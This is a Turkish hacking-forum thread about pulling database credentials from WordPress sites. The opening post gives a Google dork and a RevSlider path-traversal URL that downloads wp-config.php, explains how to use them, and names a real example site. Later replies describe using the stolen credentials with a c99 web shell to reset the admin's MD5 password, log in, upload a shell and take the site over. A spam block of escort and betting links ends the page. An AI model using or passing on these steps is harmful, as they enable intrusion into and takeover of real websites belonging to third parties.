Wordpress DB bilgilerini çekme

MuRo

MuRo

Özel Üye
Katılım
20 Eyl 2012
Mesajlar
425
Tepkime puanı
1
Puanları
0
Bu exploit ile db bilgilerine ulaşabilirsiniz. Gerisi sizin hayal gücünüz

DORK: revslider.php “index of”

Exploit:
Siteadı.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Lütfen bu açığa sahip türk sitelerinde kullanmayınız.
Nasıl kullanacağınızı kısaca anlatayım:
revslider.php “index of” bunu google da aratınız ve sonuçlanan sitelerde
exploiti uygulayınız. Bulduğunuz sitenin ismini site adı yazan kısma yerleştirmeniz yeterli daha sonra inen dosyayı actığınızda db bilgilerine ulaşacaksınız.

ÖRNEK SİTE ;

http://gumusyan.com//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
ScarySpy

ScarySpy

Spys-Z
Katılım
22 Ocak 2014
Mesajlar
1,000
Tepkime puanı
0
Puanları
0
kardeşim peki burda admin id sifresi yazmıyor db yazıyor ne gibi yararı olucak bize :) ?
 
MuRo

MuRo

Özel Üye
Katılım
20 Eyl 2012
Mesajlar
425
Tepkime puanı
1
Puanları
0
Bu exploit ile db bilgilerine ulaşabilirsiniz. Gerisi sizin hayal gücünüz

Demişim en üstte :)
 
ScarySpy

ScarySpy

Spys-Z
Katılım
22 Ocak 2014
Mesajlar
1,000
Tepkime puanı
0
Puanları
0
:) ama ne gibi faydası olucaki ? :)
 
MuRo

MuRo

Özel Üye
Katılım
20 Eyl 2012
Mesajlar
425
Tepkime puanı
1
Puanları
0
Birçok Faydası olacak Kendini Geliştir araştır neler yapabilcegini göreceksin Sana Balık tutmayı ögretiyorum ben Yemeyide siz bi yapın bi zahmet
 
ScarySpy

ScarySpy

Spys-Z
Katılım
22 Ocak 2014
Mesajlar
1,000
Tepkime puanı
0
Puanları
0
ama bu bilgileri bilgili kişilerden almıycaksak ajanlar.orgda işmiz ne yani :)
 
ByDokunulmaz

ByDokunulmaz

Özel Üye
Katılım
25 Haz 2013
Mesajlar
935
Tepkime puanı
0
Puanları
0
Yaş
29
Web sitesi
ajanlar.org
ScarY' Alıntı:
ama bu bilgileri bilgili kişilerden almıycaksak ajanlar.orgda işmiz ne yani :)
Genişletmek için tıkla ...

ScarY' Alıntı:
:) ama ne gibi faydası olucaki ? :)
Genişletmek için tıkla ...

Db Bilgileri ile başka bir sitedeki shell den misal c99 ile sql ile veri tabanına bağlanırsın. ve wp users tablosuna girip oradan admin bilgilerini değiştirirsin. yeni bir şifre oluşturursun tabi md5 şeklinde veri tabanına ekler kayıt edersin. siteden ../wp-login.php şeklinde giriş yaparsın ve shell atarsın. (
) ondan sonra hacklersin. Eğer ki shell atamazsan veritabanından wp post tablosuna girip oradan me ta atabilrsin. Saygılar..
 
ScarySpy

ScarySpy

Spys-Z
Katılım
22 Ocak 2014
Mesajlar
1,000
Tepkime puanı
0
Puanları
0
helal kardesm :)
 
Antidote

Antidote

Özel Üye
Katılım
21 Ocak 2014
Mesajlar
1,015
Tepkime puanı
0
Puanları
0
Web sitesi
ajanlar.org
Sunucuda Bir Siteye Shell Atarsın Sonra Mysql ile baglanırsın Admin Şifrelerini Değişitirir Siteye Basarsın
 
No Dead

No Dead

Spys-Z
Katılım
27 Tem 2014
Mesajlar
219
Tepkime puanı
0
Puanları
0
Eyvallah muro başkan :)
 
Cevap yazmak için giriş yap yada kayıt ol.

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort marmaris escort bodrum escort vozol puff sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort ankara escort meritking giriş
Üst
Copyright® Ajanlar.org 2012